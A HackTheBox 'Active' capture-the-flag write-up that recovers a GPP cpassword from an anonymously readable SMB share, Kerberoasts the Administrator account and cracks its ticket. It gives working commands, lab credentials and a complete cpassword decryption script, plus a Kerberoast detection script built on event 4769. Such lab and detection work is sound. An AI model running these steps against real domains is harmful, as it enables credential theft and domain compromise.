Hackthebox Writeup: Active
Output of nmap:
# Nmap 7.94 scan initiated Mon Sep 4 17:39:56 2023 as: /usr/bin/nmap -sCV -p88,135,139,389,445,464,593,636,49152,49153,49154,49155,49157,49158 --open -oN nmap/Script_10.10.10.100.nmap --system-dns --stats-every 2s 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-04 15:40:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-09-04T15:40:56
|_ start_date: 2023-09-04T15:39:38
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 4 17:40:57 2023 -- 1 IP address (1 host up) scanned in 60.54 seconds
Using enum4linux-ng, we find that the SMB service accepts a null session (anonymous login). Impacket's smbclient.py confirms it and lists the shares without a password:
$ smbclient.py -no-pass 10.10.10.100
While the Users share is not accessible to us, we can access the Replication share. Its layout is that of SYSVOL (Policies/{GUID}/MACHINE/...), which every authenticated domain user can read by design; here it is exposed to anonymous users as well.
We see a single folder inside the share and download it recursively with smbclient.
In this directory we find /Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (that GUID is the Default Domain Policy). It is a Group Policy Preferences file that creates or updates a local user, and it carries a cpassword attribute. GPP encrypts cpassword with AES-256, but the key is fixed and was published by Microsoft in the MSDN documentation, so anyone who can read the file can recover the password. MS14-025 (2014) stopped Windows from writing new cpassword values, but it did not remove existing ones from SYSVOL, which is why they are still found on older domains. gpp-decrypt does the decryption in one step:
$ python3 gpp-decrypt.py -f ~/htb/active/smb-replication/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18
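How that decryption works, as an added example that is not part of this writeup and not the gpp-decrypt tool's code: GPP encrypts cpassword with AES-256-CBC, a zero IV and the 32-byte key Microsoft published in MSDN; the stored value is base64 with its '=' padding stripped, and the plaintext is a UTF-16LE string with PKCS#7 padding. The script below pulls every cpassword out of a GPP XML file and decrypts it. The Groups.xml in it is constructed for the example (modelled on the file from the Replication share); the cpassword value is assumed to be the one from this box's file, since the page only shows the decrypted result. The AES backend is whichever of pycryptodome, cryptography or the openssl CLI is installed.

```python
"""Decrypt a Group Policy Preferences cpassword (MS14-025).

Added example for this writeup, not the page's own code. GPP encrypts
cpassword with AES-256-CBC under a key Microsoft published in MSDN,
with a zero IV; the stored value is base64 with its '=' padding
removed, and the plaintext is UTF-16LE with PKCS#7 padding.
"""
import base64
import subprocess
import xml.etree.ElementTree as ET

# The 32-byte key from Microsoft's "2.2.1.1.4 Password Encryption" page.
# It is the same for every domain, which is the whole vulnerability.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
ZERO_IV = bytes(16)

# Constructed Groups.xml modelled on the one in the Replication share.
# The cpassword value is assumed to be the one from this box's file; the
# page itself only shows the decrypted result.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""


def _aes256_cbc_decrypt(ciphertext: bytes) -> bytes:
    """Raw AES-256-CBC decrypt (padding left in place) with whichever
    backend is available: pycryptodome, cryptography, or the openssl CLI."""
    try:
        from Crypto.Cipher import AES  # pycryptodome
        return AES.new(GPP_AES_KEY, AES.MODE_CBC, ZERO_IV).decrypt(ciphertext)
    except ImportError:
        pass
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(ZERO_IV)).decryptor()
        return dec.update(ciphertext) + dec.finalize()
    except ImportError:
        pass
    try:
        return subprocess.run(
            ["openssl", "enc", "-d", "-aes-256-cbc", "-nopad",
             "-K", GPP_AES_KEY.hex(), "-iv", ZERO_IV.hex()],
            input=ciphertext, capture_output=True, check=True,
        ).stdout
    except FileNotFoundError:
        raise RuntimeError("no AES backend found; pip install pycryptodome")


def gpp_decrypt(cpassword: str) -> str:
    """cpassword attribute value -> cleartext password."""
    # GPP strips the base64 '=' padding; put it back before decoding.
    cpassword += "=" * (-len(cpassword) % 4)
    plaintext = _aes256_cbc_decrypt(base64.b64decode(cpassword))
    # Strip PKCS#7 padding. A bad pad means the input was not a GPP
    # cpassword at all (corrupted value, or not encrypted with this key).
    pad = plaintext[-1]
    if not 1 <= pad <= 16 or plaintext[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword?")
    return plaintext[:-pad].decode("utf-16-le")


# GPP stores the account name under a different attribute per file type
# (Groups.xml: userName; Services.xml: accountName; ScheduledTasks.xml: runAs).
_ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpasswords(xml_text: str) -> list[tuple[str, str]]:
    """Return (account, cleartext) for every <Properties> carrying a
    cpassword; the same walk works for Groups.xml, Services.xml,
    ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml."""
    found = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.get("cpassword")
        if not cp:
            continue  # an empty cpassword means "no password set", not a blank one
        account = next((props.get(a) for a in _ACCOUNT_ATTRS if props.get(a)), "?")
        found.append((account, gpp_decrypt(cp)))
    return found


if __name__ == "__main__":
    for account, password in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{account}: {password}")
```

Run it against every Preferences XML you pull from SYSVOL, not just Groups.xml; the padding check is what tells a genuine cpassword apart from some other base64 blob an admin stuffed into an attribute.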
With the obtained credentials we can authenticate to SMB as SVC_TGS and access the Users share:
smbclient -U "active.htb/SVC_TGS%GPPstillStandingStrong2k18" //10.10.10.100/Users
We pull the entire Users share recursively, but there is nothing interesting inside.
Kerberoasting
This is a very useful cheat sheet when dealing with Active Directory boxes: you enter what you have (e.g. just a username, or a username and password) and the service you want to target, and it tells you which tools you are able to run. With this, I discovered I can start Kerberoasting.
Kerberoasting works because any authenticated domain user may request a service ticket (TGS) for any account that has a servicePrincipalName set. The KDC encrypts part of that ticket with the service account's own password hash, so the ticket can be taken offline and cracked without any further contact with the DC. GetUserSPNs.py lists the accounts with SPNs and, with -request, fetches a ticket for each of them:
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-09-04 17:40:44.644949
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$dc5d5dea8e316af3a5fbd129d8ea714b$...
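Before cracking, the defender's side of that request, as an added example that is not part of the writeup: each TGS request lands in the domain controller's Security log as event 4769, and a Kerberoast stands out as a user account asking for RC4 tickets (TicketEncryptionType 0x17, which is what produces the $krb5tgs$23$ ticket above) for services that run under user accounts rather than computer accounts. The records below are constructed to mimic what the GetUserSPNs.py run above would leave behind; the field names follow the 4769 schema, while the attacker address 10.10.14.5 and the other values are assumed.

```python
"""Spot a Kerberoast in Security event 4769 (Kerberos service ticket
requested). Added example, not part of the writeup.

The sample records are constructed: one is the request SVC_TGS makes for
the Administrator SPN with RC4 (0x17), the rest are ordinary traffic
(machine-account tickets and a krbtgt referral) that must not alert.
Field names follow the 4769 event schema; the values are assumed.
"""
from collections import defaultdict

RC4_HMAC = "0x17"

SAMPLE_4769 = [
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.100", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
]


def is_roastable_request(ev: dict) -> bool:
    """True for a successful TGS request whose ticket is worth cracking
    offline: RC4 encryption, for a service that runs under a user account
    (computer accounts have 120-character random passwords, and a 4769
    naming krbtgt is a TGT renewal or referral, not a service ticket)."""
    svc = ev.get("ServiceName", "")
    return (
        ev.get("EventID") == 4769
        and ev.get("Status") == "0x0"
        and ev.get("TicketEncryptionType") == RC4_HMAC
        and not svc.endswith("$")
        and svc.lower() != "krbtgt"
    )


def kerberoast_alerts(events, min_services: int = 1) -> list:
    """One alert per requester that obtained RC4 tickets for at least
    `min_services` distinct user-account services. GetUserSPNs.py -request
    asks for every SPN in one go, so in a real domain a threshold of a few
    services separates it from the odd legacy RC4-only application."""
    by_user = defaultdict(lambda: {"services": set(), "sources": set()})
    for ev in events:
        if is_roastable_request(ev):
            rec = by_user[ev["TargetUserName"]]
            rec["services"].add(ev["ServiceName"])
            rec["sources"].add(ev["IpAddress"])
    return [
        {"requester": user,
         "services": sorted(rec["services"]),
         "sources": sorted(rec["sources"])}
        for user, rec in sorted(by_user.items())
        if len(rec["services"]) >= min_services
    ]


if __name__ == "__main__":
    for alert in kerberoast_alerts(SAMPLE_4769):
        print(f"{alert['requester']} pulled RC4 tickets for {alert['services']} "
              f"from {alert['sources']}")
```

The encryption type is the strongest signal: once the service accounts carry AES keys and RC4 is disabled on them, a 4769 with 0x17 for a user-account service has almost no legitimate explanation, and the tickets that do get issued take far longer to crack.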
We now have a ticket for the Administrator account, encrypted under that account's own password hash. The interesting part is that the built-in Administrator has an SPN (active/CIFS:445) registered at all: that is what lets any authenticated domain user ask for this ticket. It came back with RC4-HMAC (etype 23, hence the $krb5tgs$23$ prefix), which hashcat cracks as mode 13100 (AES tickets, etype 17 and 18, would be modes 19600 and 19700 and crack far slower):
$ hashcat -m 13100 --attack-mode 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt
Turns out the password is Ticketmaster1968. We can now open the Users share as Administrator and read the root flag from the Administrator profile:
$ smbclient -U "active.htb/Administrator%Ticketmaster1968" //10.10.10.100/Users
The same credentials also give a SYSTEM shell through Impacket's psexec.py or wmiexec.py, should a flag read not be enough.